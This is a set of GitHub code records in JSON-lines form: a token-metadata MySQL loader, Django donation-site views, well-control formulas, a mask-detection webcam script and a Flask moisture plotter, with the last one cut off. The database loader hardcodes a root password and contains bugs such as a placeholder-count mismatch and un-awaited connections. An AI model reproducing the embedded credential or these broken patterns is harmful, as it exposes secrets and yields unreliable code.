path(\"login/\", LoginShootView.as_view(), name=\"login\"),\n path(\"logout/\", LogoutShootView.as_view(), name=\"logout\"),\n]\n","repo_name":"ascartazzini/heyshoot","sub_path":"rh/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74373123680","text":"import coin_marketcap.metadata_api as cmc_api\nimport asyncio\nimport json\nimport aiomysql\n\nimport sys\nsys.path.append('./')\n\nDB_IN_USED = 'cmc_token2'\nloop = asyncio.get_event_loop()\nresult = None\n\n#########################################################################\n# get the async connection to the database\n# @param loop: the event loop\n#\n\n\nasync def get_connection_to_database(loop):\n\n # Connect to the database\n connection = await aiomysql.connect(\n host='localhost',\n user='root',\n password='wewemaylalong2A!',\n loop=loop,\n )\n async with connection.cursor() as cursor:\n await cursor.execute(\"CREATE DATABASE IF NOT EXISTS %s\" % (DB_IN_USED,))\n await cursor.execute(\"USE %s\" % (DB_IN_USED,))\n await connection.commit()\n return connection\n\n#\n# get the async connection POOL to the database\n#\n\n\nasync def get_pool_connection(loop):\n pool = await aiomysql.create_pool(\n host='localhost',\n user='root',\n password='wewemaylalong2A!',\n loop=loop,\n db='%s' % (DB_IN_USED,),\n )\n\n return pool\n\n#########################################################################\n\n# init database\n\n\nasync def cmc_init_database(loop, name=''):\n # Connect to the database\n con = await get_connection_to_database(loop)\n if name == None:\n name = ''\n # delete the table if it exists\n # create a new ones\n async with con.cursor() as cursor:\n await cursor.execute(\"DROP TABLE IF EXISTS cmc_metadata;\")\n await cursor.execute(\"DROP TABLE IF EXISTS cmc_price;\")\n await cursor.execute('''\n CREATE TABLE %scmc_metadata (\n id INT PRIMARY KEY, \n name VARCHAR(255), \n symbol VARCHAR(255), \n slug VARCHAR(255), \n cmc_rank INT, \n is_active INT, \n first_historical_data VARCHAR(255),\n last_historical_data VARCHAR(255),\n platform INT,\n token_address VARCHAR(255)\n )\n ''' % (name,))\n await cursor.execute('''\n CREATE TABLE %scmc_price (\n id INT PRIMARY KEY,\n num_market_pair INT,\n circulating_supply INT,\n total_supply INT,\n max_supply INT,\n last_updated VARCHAR(255),\n date_added VARCHAR(255),\n usd_price FLOAT,\n usd_volume_24h FLOAT,\n percent_change_1h FLOAT,\n percent_change_24h FLOAT,\n percent_change_7d FLOAT,\n market_cap FLOAT,\n fully_diluted_market_cap FLOAT\n )''' % (name, ))\n await con.commit()\n\n con.close()\n\n\nasync def call_fill_to_metadata(loop):\n packet_of_data = cmc_api.get_active_token_metadata()\n loop.run_until_complete(fill_to_metadata(loop, packet_of_data))\n print('Completed filling to metadata: active token')\n\n packet_of_data = cmc_api.get_inactive_token_metadata()\n loop.run_until_complete(fill_to_metadata(loop, packet_of_data))\n print('Completed filling to metadata: inactive token')\n\n packet_of_data = cmc_api.get_untracked_token_metadata()\n loop.run_until_complete(fill_to_metadata(loop, packet_of_data))\n print('Completed filling to metadata: untracked token')\n\n# fill data from the API to the database\n\n\nasync def fill_to_metadata(loop, data: list, db_name: str = 'cmc_metadata'):\n pool = await get_pool_connection(loop)\n # Get the data from the API\n\n async with pool.acquire() as con:\n print('\\n\\n', len(data), '\\n')\n for token in data:\n cursor = await con.cursor()\n # Get the data from the API\n id = token['id']\n name = token['name']\n symbol = token['symbol']\n slug = token['slug']\n cmc_rank = token['rank']\n is_active = token['is_active']\n try: \n first_historical_data = token['first_historical_data']\n last_historical_data = token['last_historical_data']\n except Exception:\n first_historical_data = None\n last_historical_data = None\n if token['platform'] is None:\n platform = -1\n token_address = None\n else:\n platform = token['platform']['id']\n token_address = token['platform']['token_address']\n\n # Insert the data into the database\n await cursor.execute('''\n INSERT INTO '''+ db_name +''' VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s);''',\n (id, name, symbol, slug, cmc_rank, is_active,\n first_historical_data, last_historical_data, platform, token_address,))\n print('Insert %s %s %s' % (id, name, symbol))\n await con.commit()\n pool.close()\n await pool.wait_closed()\n\n\nasync def fill_to_price(loop, db_name='cmc_price'):\n pool = await get_pool_connection(loop)\n # Get the data from the API\n data = cmc_api.get_token_price_from_cmc()\n\n async with pool.acquire() as con:\n print('\\n\\n', len(data), '\\n')\n for token in data:\n cursor = await con.cursor()\n # Get the data from the API\n id = token['id']\n num_market_pair = token['num_market_pairs']\n circulating_supply = token['circulating_supply']\n total_supply = token['total_supply']\n max_supply = token['max_supply']\n last_updated = token['last_updated']\n date_added = token['date_added']\n usd_price = token['quote']['USD']['price']\n usd_volume_24h = token['quote']['USD']['volume_24h']\n percent_change_1h = token['quote']['USD']['percent_change_1h']\n percent_change_24h = token['quote']['USD']['percent_change_24h']\n percent_change_7d = token['quote']['USD']['percent_change_7d']\n market_cap = token['quote']['USD']['market_cap']\n fully_diluted_market_cap = token['quote']['USD']['fully_diluted_market_cap']\n # Insert the data into the database\n await cursor.execute('''\n INSERT INTO ''' + db_name + ''' VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)''', (db_name, id, num_market_pair, circulating_supply, total_supply, max_supply, last_updated, date_added,\n float(usd_price), float(usd_volume_24h), float(\n percent_change_1h), float(percent_change_24h),\n float(percent_change_7d), float(market_cap), float(fully_diluted_market_cap),))\n await con.commit()\n pool.close()\n await pool.wait_closed()\n\n# run SELECT query on the database\n# return something based on the params\n\n\nasync def get_metadata(loop, id='', token_address: str = '', name: str = '', symbol: str = ''):\n global result\n con = await get_connection_to_database(loop)\n async with con.cursor() as cursor:\n if id is not None:\n await cursor.execute('''\n SELECT * FROM cmc_metadata WHERE id = %s''', (id,))\n elif token_address is not None:\n await cursor.execute('''\n SELECT * FROM cmc_metadata WHERE token_address = %s''', (token_address,))\n elif name is not None:\n await cursor.execute('''\n SELECT * FROM cmc_metadata WHERE name = %s''', (name,))\n elif symbol is not None:\n await cursor.execute('''\n SELECT * FROM cmc_metadata WHERE symbol = %s''', (symbol,))\n else:\n await cursor.execute('''\n SELECT * FROM cmc_metadata''')\n result = await cursor.fetchall()\n await con.commit()\n con.close()\n\n\n# run SELECT query on the database\n# return price of the token based on id\nasync def get_price(loop, id: str):\n global result\n con = await get_connection_to_database(loop)\n async with con.cursor() as cursor:\n await cursor.execute('''\n SELECT * FROM cmc_price WHERE id = %s''', (id,))\n result = await cursor.fetchall()\n await con.commit()\n con.close()\n\n# update the database with the new data\n\n\nasync def update_metadata(loop, token_metadata):\n con = get_connection_to_database(loop)\n async with con.cursor() as cursor:\n await cursor.execute('''\n UPDATE cmc_metadata SET name = %s, symbol = %s, slug = %s, cmc_rank = %s, is_active = %s, first_historical_data = %s, last_historical_data = %s, platform = %s, token_address = %s WHERE id = %s''',\n (token_metadata['name'], token_metadata['symbol'], token_metadata['slug'], token_metadata['cmc_rank'], token_metadata['is_active'], token_metadata['first_historical_data'], token_metadata['last_historical_data'], token_metadata['platform'], token_metadata['token_address'], token_metadata['id']))\n await con.commit()\n con.close()\n\n\nasync def change_name(loop):\n con = get_connection_to_database(loop)\n async with con.cursor() as cursor:\n await cursor.execute('''\n ALTER TABLE cmc_metadata RENAME TO backup_cmc_metadata;\n ALTER TABLE new_cmc_metadata RENAME TO cmc_metadata;\n ALTER TABLE cmc_price RENAME TO backup_cmc_price;\n ALTER TABLE new_cmc_price RENAME TO cmc_price;\n ''')\n await con.commit()\n con.close()\n\n\nasync def backup(loop, db: list):\n con = get_connection_to_database(loop)\n async with con.cursor() as cursor:\n if db.index('cmc_metadata') != -1:\n await cursor.execute('''\n ALTER TABLE cmc_metadata RENAME TO error_cmc_metadata;\n ALTER TABLE backup_cmc_metadata RENAME TO cmc_metadata;\n DROP TABLE error_cmc_metadata;\n ''')\n await con.commit()\n if db.index('cmc_price') != -1:\n await cursor.execute('''\n ALTER TABLE cmc_price RENAME TO error_cmc_price;\n ALTER TABLE backup_cmc_price RENAME TO cmc_price;\n DROP TABLE error_cmc_price; ''')\n await con.commit()\n con.close()\n\n\ndef get_result():\n return result\n\n\ndef clear_result():\n global result\n result = None\n","repo_name":"auditrate-tech/detect-scam","sub_path":"database/cmc_db.py","file_name":"cmc_db.py","file_ext":"py","file_size_in_byte":10594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"6532475405","text":"from urllib import quote_plus\n\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db.models import Q\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils import timezone\n\nfrom .forms import HomeForm\nfrom .models import Home\n\n# Create your views here.\n\n\ndef home_create(request):\n\tif not request.user.is_staff or not request.user.is_superuser:\n\t\t\traise Http404\n\tform = HomeForm(request.POST or None, request.FILES or None)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.user = request.user\n\t\tinstance.save()\n\t\tmessages.success(request, \"Successfully Created\")\n\t\treturn HttpResponseRedirect(instance.get_absolute_url())\n\tcontext = {\n\t\t\"form\": form,\n\t}\n\treturn render(request, \"home_form.html\", context)\n\ndef home_detail(request, slug=None):\n\tinstance = get_object_or_404(Home, slug=slug) \n\tif instance.publish > timezone.now().date() or instance.draft:\n\t\tif not request.user.is_staff or not request.user.is_superuser:\n\t\t\traise Http404\n\tshare_string = quote_plus(instance.about_home)\n\tcontext = {\n\t\"title\": \"Single Template\",\n\t\"instance\": instance,\n\t\"share_string\": share_string,\n\t}\n\treturn render(request, \"single_home.html\", context)\n\ndef home_list(request):\n\ttoday = timezone.now().date()\n\tqueryset_list = Home.objects.active()\n\tif request.user.is_staff or request.user.is_superuser:\n\t\tqueryset_list = Home.objects.all()\n\tquery = request.GET.get(\"q\")\n\tif query:\n\t\tqueryset_list = queryset_list.filter(\n\t\t\t\tQ(home_name__icontains=query)|\n\t\t\t\tQ(about_home__icontains=query)|\n\t\t\t\tQ(email__icontains=query)|\n\t\t\t\tQ(managers_name__icontains=query)|\n\t\t\t\t# Q(about_home__icontains=query)|\n\t\t\t\tQ(phone_number__icontains=query)|\n\t\t\t\tQ(managers_id_no__icontains=query)\n\t\t\t\t# Q(about_manager__icontains=query)|\n\t\t\t\t# Q(county__icontains=query)|\n\t\t\t\t# Q(constituency__icontains=query)|\n\t\t\t\t# Q(ward__icontains=query)|\n\t\t\t\t# Q(children_gender__icontains=query)|\n\t\t\t\t# Q(user__first_name__icontains=query) |\n\t\t\t\t# Q(user__last_name__icontains=query)\n\t\t\t\t).distinct()\n\tpaginator = Paginator(queryset_list, 8) # Show 25 contacts per page\n\tpage_request_var = \"search\"\n\tpage = request.GET.get(page_request_var)\n\ttry:\n\t\tqueryset = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\t# If page is not an integer, deliver first page.\n\t\tqueryset = paginator.page(1)\n\texcept EmptyPage:\n\t\t# If page is out of range (e.g. 9999), deliver last page of results.\n\t\tqueryset = paginator.page(paginator.num_pages)\n\tcontext = {\n\t\"object_list\": queryset,\n\t\"title\": \"List\",\n\t\"page_request_var\": page_request_var,\n\t\"today\": today,\n\t}\n\treturn render(request, \"home.html\", context)\n\t\ndef home_update(request, slug=None):\n\tif not request.user.is_staff or not request.user.is_superuser:\n\t\t\traise Http404\n\tinstance = get_object_or_404(Home, slug=slug) \n\tform = HomeForm(request.POST or None, request.FILES or None, instance=instance)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\tmessages.success(request, \"The home was changed successfully.\")\n\t\treturn HttpResponseRedirect(instance.get_absolute_url())\n\tcontext = {\n\t\"title\": \"Edit\",\n\t\"instance\": instance,\n\t\"form\": form,\n\t}\n\treturn render(request, \"home_form.html\", context)\n\ndef home_delete(request, slug=None):\n\tif not request.user.is_staff or not request.user.is_superuser:\n\t\t\traise Http404\n\tinstance = get_object_or_404(Home, slug=slug)\n\tinstance.delete()\n\tmessages.success(request, \"Successfully Deleted\")\n\treturn redirect(\"list\")\n\ndef about(request):\n\tcontext = {}\n\ttemplate = 'about.html'\n\treturn render(request,template,context)\n\ndef team(request):\n\tcontext = {}\n\ttemplate = 'team.html'\n\treturn render(request,template,context)\n\ndef developers(request):\n\tcontext = {}\n\ttemplate = 'developers.html'\n\treturn render(request,template,context)\n\ndef contact(request):\n\tcontext = {}\n\ttemplate = 'contact.html'\n\treturn render(request,template,context)","repo_name":"Bujj/IDonate-hub","sub_path":"donate/src/homes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7196284018","text":"import drilling as dri\nimport force_and_power as fap\nimport fluid as flu\nimport general as gen\nimport production as pro\nimport math\n\n\ndef gas_migration_rate(pressure_value, pressure_units, mud_value, mud_units):\n pressure = gen.pressure(pressure_value, pressure_units)\n mud_weight = dri.mud_weight(mud_value, mud_units)\n migration_rate = pressure['psi'] / (mud_weight['ppg'] * 0.052)\n return fap.velocity(migration_rate, 'ft/hr')\n\n\ndef max_shutin_casing_pressure(pressure_value, pressure_units,\n tvd_value, depth_units,\n original_mud_value,\n current_mud_value, mud_units):\n pressure = gen.pressure(pressure_value, pressure_units)\n original_mud = dri.mud_weight(original_mud_value, mud_units)\n current_mud = dri.mud_weight(current_mud_value, mud_units)\n tvd = gen.length(tvd_value, depth_units)\n new_pressure = pressure['psi'] - (tvd['ft'] *\n (current_mud['ppg'] -\n original_mud['ppg']) * 0.052)\n return gen.pressure(new_pressure, 'psi')\n\n\ndef influx_height(gain_value, volume_units, annular_value, annular_units):\n gain = gen.volume(gain_value, volume_units)\n annular_capacity = pro.pipe_capacity(annular_value, annular_units)\n influx_height = gain['bbl']/annular_capacity['bbl/ft']\n return gen.length(influx_height, 'ft')\n\n\ndef gas_migration_estimation(mud_value, mud_units):\n mud_weight = dri.mud_weight(mud_value, mud_units)\n migration_rate = 12 * math.exp(-0.37 * mud_weight['ppg'])\n return fap.velocity(migration_rate, 'ft/s')\n\n\ndef influx_type_estimation(casing_pressure, pipe_pressure, pressure_units,\n influx_height, height_units,\n mud_value, mud_units):\n casing_pressure = gen.pressure(casing_pressure, pressure_units)\n pipe_pressure = gen.pressure(pipe_pressure, pressure_units)\n influx_height = gen.length(influx_height, height_units)\n mud_weight = dri.mud_weight(mud_value, mud_units)\n influx_weight = (mud_weight['ppg'] -\n ((casing_pressure['psi'] -\n pipe_pressure['psi']) /\n (0.052 * influx_height['ft'])))\n influx_type = 'Gas Influx'\n if 3 < influx_weight <= 7:\n influx_type = 'Oil Influx or Combination Oil and Gas kick'\n elif influx_weight > 7:\n influx_type = 'Water Kick'\n return {'influx_weight': dri.mud_weight(influx_weight, 'ppg'),\n 'influx_type': influx_type}\n\n\ndef final_circulating_pressure(pressure_value, pressure_units, kill_mud,\n original_mud, mud_units):\n pressure = gen.pressure(pressure_value, pressure_units)\n kill_mud = dri.mud_weight(kill_mud, mud_units)\n original_mud = dri.mud_weight(original_mud, mud_units)\n circulating_pressure = (pressure['psi'] * kill_mud['ppg'] /\n original_mud['ppg'])\n return gen.pressure(circulating_pressure, 'psi')\n\n\ndef inital_circulating_pressure(scr_value, sidpp_value, pressure_units):\n scr_pressure = gen.pressure(scr_value, pressure_units)\n sidpp_pressure = gen.pressure(sidpp_value, pressure_units)\n return gen.pressure(scr_pressure['psi'] + sidpp_pressure['psi'], 'psi')\n\n\ndef formation_pressure_kick_analysis(sidpp_value, pressure_units,\n tvd_value, depth_units,\n mud_value, mud_units):\n sidpp_value = gen.pressure(sidpp_value, pressure_units)\n mud = dri.mud_weight(mud_value, mud_units)\n tvd = gen.length(tvd_value, depth_units)\n formation_pressure = sidpp_value['psi'] + (0.052 * tvd['ft'] * mud['ppg'])\n return gen.pressure(formation_pressure, 'psi')\n\n\ndef pressure_loss_gas_cut(mud_value, mud_units, annular_value, annular_units,\n gain_value, gain_units):\n mud = dri.mud_weight(mud_value, mud_units)\n annular_capacity = pro.pipe_capacity(annular_value, annular_units)\n pit_gain = gen.volume(gain_value, gain_units)\n pressure_loss = ((mud['ppg'] * 0.052) /\n annular_capacity['bbl/ft']) * pit_gain['bbl']\n return gen.pressure(pressure_loss, 'psi')\n\n\ndef kick_penetration_pressure_increase(gain_value, gain_units, mud_value,\n kick_value, mud_units, hole_id_value,\n bha_od_value, pipe_od_value, dia_value,\n bha_length, length_units):\n pit_gain = gen.volume(gain_value, gain_units)\n mud = dri.mud_weight(mud_value, mud_units)\n kick = dri.mud_weight(kick_value, mud_units)\n hole_id = gen.length(hole_id_value, dia_value)\n bha_od = gen.length(bha_od_value, dia_value)\n pipe_od = gen.length(pipe_od_value, dia_value)\n bha = gen.length(bha_length, length_units)\n hole_capacity = hole_id['in']**2 / 1029.4\n annular_capacity_bha = (hole_id['in']**2 - bha_od['in']**2)/1029.4\n annular_capacity_pipe = (hole_id['in']**2 - pipe_od['in']**2)/1029.4\n kick_height_hole = pit_gain['bbl'] / hole_capacity\n kick_height_annulus = 0\n if annular_capacity_bha * bha['ft'] > pit_gain['bbl']:\n kick_height_annulus = pit_gain['bbl'] / annular_capacity_bha\n else:\n kick_height_annulus = (bha['ft'] + ((pit_gain['bbl'] -\n (annular_capacity_bha *\n bha['ft'])) /\n annular_capacity_pipe))\n casing_pressure_increase = ((kick_height_annulus - kick_height_hole) *\n 0.052 * (mud['ppg'] - kick['ppg']))\n return gen.pressure(casing_pressure_increase, 'psi')\n\n\ndef kick_tolerance_factor(shoe_value, tvd_value, depth_units,\n max_mud_value, mud_value, mud_units):\n shoe_value = gen.length(shoe_value, depth_units)\n tvd_value = gen.length(tvd_value, depth_units)\n max_mud = dri.mud_weight(max_mud_value, mud_units)\n mud = dri.mud_weight(mud_value, mud_units)\n ktf = (shoe_value['ft'] / tvd_value['ft']) * (max_mud['ppg'] - mud['ppg'])\n return dri.mud_weight(ktf, 'ppg')\n\n\ndef kill_mud_weight(pressure_value, pressure_units, mud_value, mud_units,\n tvd_value, depth_units):\n pressure = gen.pressure(pressure_value, pressure_units)\n mud = dri.mud_weight(mud_value, mud_units)\n tvd_value = gen.length(tvd_value, depth_units)\n kill_mud_weight = (mud['ppg'] + (pressure['psi'] /\n (0.052 * tvd_value['ft'])))\n return dri.mud_weight(kill_mud_weight, 'ppg')\n\n\n# lube increment and mud increment\ndef fluid_increment(pressure_value, pressure_units,\n casing_id_value, pipe_od_value, dia_units,\n mud_value, mud_units):\n pressure = gen.pressure(pressure_value, pressure_units)\n casing_id = gen.length(casing_id_value, dia_units)\n pipe_od = gen.length(pipe_od_value, dia_units)\n mud = dri.mud_weight(mud_value, mud_units)\n annular_capacity = (casing_id['in']**2 - pipe_od['in']**2) / 1029.4\n lube_increment = pressure['psi'] * annular_capacity / (0.052 * mud['ppg'])\n return {'annular_capacity': pro.pipe_capacity(annular_capacity, 'bbl/ft'),\n 'lube_increment': gen.volume(lube_increment, 'bbl')}\n\n\ndef max_formation_pressure(kick_factor, mud_value, mud_units,\n tvd_value, depth_units):\n kick_factor = dri.mud_weight(kick_factor, mud_units)\n mud = dri.mud_weight(mud_value, mud_units)\n tvd_value = gen.length(tvd_value, depth_units)\n max_formation_pressure = (0.052 * (kick_factor['ppg'] + mud['ppg']) *\n tvd_value['ft'])\n return gen.pressure(max_formation_pressure, 'psi')\n\n\ndef max_influx_height(casing_pressure, pressure_units, mud_value,\n influx_value, gradient_units):\n masicp = gen.pressure(casing_pressure, pressure_units)\n mud = dri.pressure_grad(mud_value, gradient_units)\n influx = dri.pressure_grad(influx_value, gradient_units)\n return gen.length((masicp['psi'] / (mud['psi/ft'] -\n influx['psi/ft'])), 'ft')\n\n\ndef misicp(lot_value, mud_value, mud_units, tvd_value, depth_units):\n lot = dri.mud_weight(lot_value, mud_units)\n mud = dri.mud_weight(mud_value, mud_units)\n tvd_value = gen.length(tvd_value, depth_units)\n max_formation_pressure = (0.052 * (lot['ppg'] - mud['ppg']) *\n tvd_value['ft'])\n return gen.pressure(max_formation_pressure, 'psi')\n\n\ndef max_pit_gain_gas_kick_wbm(pressure_value, pressure_units,\n pit_gain, volume_units,\n mud_value, mud_units,\n annular_value, annular_units):\n formation_pressure = gen.pressure(pressure_value, pressure_units)\n gain = gen.volume(pit_gain, volume_units)\n mud = dri.mud_weight(mud_value, mud_units)\n annular_capacity = pro.pipe_capacity(annular_value, annular_units)\n max_gain = 4 * (((formation_pressure['psi'] * gain['bbl'] *\n annular_capacity['bbl/ft'] / mud['ppg']))**0.5)\n return gen.volume(max_gain, 'bbl')\n\n\ndef max_surface_pressure_gas_influx_wbm(pressure_value, pressure_units,\n pit_gain, volume_units,\n mud_value, mud_units,\n annular_value, annular_units):\n formation_pressure = gen.pressure(pressure_value, pressure_units)\n gain = gen.volume(pit_gain, volume_units)\n mud = dri.mud_weight(mud_value, mud_units)\n annular_capacity = pro.pipe_capacity(annular_value, annular_units)\n max_pressure = 0.2 * ((formation_pressure['psi'] * gain['bbl'] *\n mud['ppg'] / annular_capacity['bbl/ft']))**0.5\n return gen.pressure(max_pressure, 'psi')\n\n\ndef max_surface_pressure_kick_tolerance(mud_value, mud_units,\n tvd_value, depth_units):\n kick_factor = dri.mud_weight(mud_value, mud_units)\n tvd = gen.length(tvd_value, depth_units)\n return gen.pressure(0.052 * kick_factor['ppg'] * tvd['ft'], 'psi')\n\n\ndef new_mud_pressure_loss(pressure_value, pressure_units, old_value,\n new_value, mud_units):\n pressure_loss = gen.pressure(pressure_value, pressure_units)\n old_mud = dri.mud_weight(old_value, mud_units)\n new_mud = dri.mud_weight(new_value, mud_units)\n return gen.pressure(pressure_loss['psi'] * new_mud['ppg'] /\n old_mud['ppg'], 'psi')\n\n\ndef new_strokes_pump_pressure(pressure_value, pressure_units,\n old_stokes, new_stokes):\n pressure_loss = gen.pressure(pressure_value, pressure_units)\n return gen.pressure(pressure_loss['psi'] * (new_stokes /\n old_stokes)**2, 'psi')\n\n\ndef riser_margin(air_gap, water_depth, tvd_value, depth_units,\n mud_value, water_value, mud_units):\n mud = dri.mud_weight(mud_value, mud_units)\n water = dri.mud_weight(water_value, mud_units)\n air_gap = gen.length(air_gap, depth_units)\n water_depth = gen.length(water_depth, depth_units)\n tvd = gen.length(tvd_value, depth_units)\n return dri.mud_weight(((air_gap['ft'] +\n water_depth['ft']) *\n mud['ppg'] -\n (water_depth['ft'] *\n water['ppg'])) /\n (tvd['ft'] -\n air_gap['ft'] - water_depth['ft']), 'ppg')\n\n\ndef time_penetrate_kick(kick_depth, bit_depth, depth_units,\n migration_value, stripping_value, velocity_units):\n kick_depth = gen.length(kick_depth, depth_units)\n bit_depth = gen.length(bit_depth, depth_units)\n migration = fap.velocity(migration_value, velocity_units)\n stripping = fap.velocity(stripping_value, velocity_units)\n return gen.time((kick_depth['ft'] - bit_depth['ft']) /\n (migration['ft/hr'] + stripping['ft/hr']), 'hr')\n\n\ndef trip_margin(yield_value, yield_units, hole_id, pipe_od, dia_units):\n yield_point = flu.fluid_yield_point(yield_value, yield_units)\n hole_id = gen.length(hole_id, dia_units)\n pipe_od = gen.length(pipe_od, dia_units)\n return dri.mud_weight(yield_point['lbf/100ft2'] /\n ((11.7 * (hole_id['in'] - pipe_od['in']))), 'ppg')\n\n\ndef accumulator_bottle_capacity_required(volume_value, volume_units,\n pre_charge_value, minimum_value,\n operating_value, pressure_units):\n required_volume = gen.volume(volume_value, volume_units)\n pre_charge = gen.pressure(pre_charge_value, pressure_units)\n operating = gen.pressure(operating_value, pressure_units)\n minimum = gen.pressure(minimum_value, pressure_units)\n usable_volume = (required_volume['gal_us'] /\n ((pre_charge['psi'] /\n minimum['psi']) -\n (pre_charge['psi'] / operating['psi'])))\n return gen.volume(usable_volume, 'gal_us')\n","repo_name":"this-isnt-me/ogPypeline","sub_path":"ogPypeline/well_control_formulas.py","file_name":"well_control_formulas.py","file_ext":"py","file_size_in_byte":13204,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"54"} +{"seq_id":"86441830973","text":"import cv2\nfrom tensorflow.keras.models import load_model\nimport numpy as np\nimport time,sys\nimport amg8833_i2c\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\nmodel = load_model(\"maskerfix1.h5\")\n\n\nt0 = time.time()\nsensor = []\nwhile (time.time()-t0)<1: # wait 1sec for sensor to start\n try:\n # AD0 = GND, addr = 0x68 | AD0 = 5V, addr = 0x69\n sensor = amg8833_i2c.AMG8833(addr=0x69) # start AMG8833\n except:\n sensor = amg8833_i2c.AMG8833(addr=0x68)\n finally:\n pass\ntime.sleep(0.1) # wait for sensor to settle\nif sensor==[]:\n print(\"No AMG8833 Found - Check Your Wiring\")\n sys.exit(); # exit the app if AMG88xx is not found \n\n\npix_res = (8,8) # pixel resolution\nxx,yy = (np.linspace(0,pix_res[0],pix_res[0]),\n np.linspace(0,pix_res[1],pix_res[1]))\nzz = np.zeros(pix_res) # set array with zeros first\n# new resolution\npix_mult = (20,15) # multiplier for interpolation \ninterp_res = (int(pix_mult[0]*pix_res[0]),int(pix_mult[1]*pix_res[1]))\ngrid_x,grid_y = (np.linspace(0,pix_res[0],interp_res[0]),\n np.linspace(0,pix_res[1],interp_res[1]))\n# interp function\ndef interp(z_var):\n # cubic interpolation on the image\n # at a resolution of (pix_mult*8 x pix_mult*8)\n f = interpolate.interp2d(xx,yy,z_var,kind='cubic')\n return f(grid_x,grid_y)\ngrid_z = interp(zz) # interpolated image\n\n\n# face_clsfr=cv2.CascadeClassifier('H:/projek masker/haarcascade_frontalface_default.xml')\nlabels_dict={1:'without_mask',0:'with_mask'}\ncolor_dict={1:(0,0,255),0:(255,0,0)}\n\nsize = 4\nwebcam = cv2.VideoCapture(0) #Use camera 0\n\n# We load the xml file\nclassifier = cv2.CascadeClassifier('haarcascade_frontalface_alt2.xml')\n\npix_to_read = 64 # read all 64 pixels\n\n\nwhile True:\n try:\n (rval, im) = webcam.read()\n # if rval:\n # continue\n # else:\n # sys.exit()\n status,pixels = sensor.read_temp(pix_to_read) # read pixels with status\n \n if status: # if error in pixel, re-enter loop and try again\n continue\n \n T_thermistor = sensor.read_thermistor() # read thermistor temp\n\n # fig.canvas.restore_region(ax_bgnd) # restore background (speeds up run)\n new_z = np.fliplr(interp(np.reshape(pixels,pix_res)))\n # print(new_z)\n im=cv2.flip(im,1,1) #Flip to act as a mirror\n\n # Resize the image to speed up detection\n mini = cv2.resize(im, (im.shape[1] // size, im.shape[0] // size))\n\n # detect MultiScale / faces \n faces = classifier.detectMultiScale(mini)\n\n # Draw rectangles around each face\n for f in faces:\n (x, y, w, h) = [v * size for v in f] #Scale the shapesize backup\n (x1,y1,w1,h1) = f\n #Save just the rectangle faces in SubRecFaces\n face_img = im[y:y+h, x:x+w]\n # face_img = im[x:x+w,y:y+h]\n temperature = new_z[x1:x1+w1, y1:y1+h1]\n # print(temperature)\n\n temperature = np.round(np.max(temperature.flatten()),1)\n resized=cv2.resize(face_img,(224,224))\n normalized=resized/255.0\n reshaped=np.reshape(normalized,(1,224,224,3))\n reshaped = np.vstack([reshaped])\n result=model.predict(reshaped)\n #print(result)\n \n label=np.argmax(result,axis=1)[0]\n # print(label)\n \n cv2.rectangle(im,(x,y),(x+w,y+h),color_dict[label],2)\n cv2.rectangle(im,(x,y-40),(x+w,y),color_dict[label],-1)\n cv2.putText(im, \"{},{}C\".format(labels_dict[label],temperature), (x, y-10),cv2.FONT_HERSHEY_SIMPLEX,0.7,(255,255,255),2)\n \n # Show the image\n cv2.imshow('masker', im)\n key = cv2.waitKey(10)\n # if Esc key is press then break out of the loop \n if key == 27: #The Esc key\n break\n except Exception as e:\n print(e)\n# Stop video\nwebcam.release()\n\n# Close all started windows\ncv2.destroyAllWindows()","repo_name":"m4ri01/mask-detection","sub_path":"tesmasker.py","file_name":"tesmasker.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41545641772","text":"import matplotlib\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nfrom flask import Flask, jsonify, render_template\nimport sqlite3 as sql\nimport numpy as np\nimport datetime\nimport os\n\napp = Flask(__name__)\n\ndef create_connection(db_file):\n \"\"\" create a database connection to the SQLite database\n specified by the db_file\n :param db_file: database file\n :return: Connection object or None\n \"\"\"\n conn = None\n try:\n conn = sql.connect(db_file)\n except sql.Error as e:\n print(e)\n \n return conn\n\n\n@app.route('/orange/api/v1.0/data', methods=['GET'])\ndef get_data():\n conn = None\n try:\n conn = sql.connect(\"moisture.db\")\n except sql.Error as e:\n print(e)\n \n\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM moisture ORDER BY id LIMIT 500\")\n\n data = cur.fetchall()\n return jsonify({'data': data})\n\n@app.route('/plot')\ndef chartTest():\n\n conn = None\n try:\n conn = sql.connect(\"/home/callum/Dev/plantproj/moisture.db\")\n except sql.Error as e:\n print(e)\n plt.clf()\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM moisture ORDER BY id DESC LIMIT 500\")\n\n data = cur.fetchall()\n dates = []\n levels = []\n #print(data)\n\n for idx, date, moisture in data:\n date = datetime.datetime.strptime(date , \"%Y-%m-%d %H:%M:%S.%f\")\n dates.append(date)\n levels.append(moisture)\n \n conn.close()\n plt.plot_date(dates, levels)\n \n plt.savefig('/home/callum/Dev/plantproj/static/images/new_plot.jpg')\n return render_template('plot.html', name = 'new_plot', url ='static/images/new_plot.jpg')\n\n\n\n\nif __name__ == '__main__':\n print(os.getcwd())\n app.run(\"0.0.0.0\" , 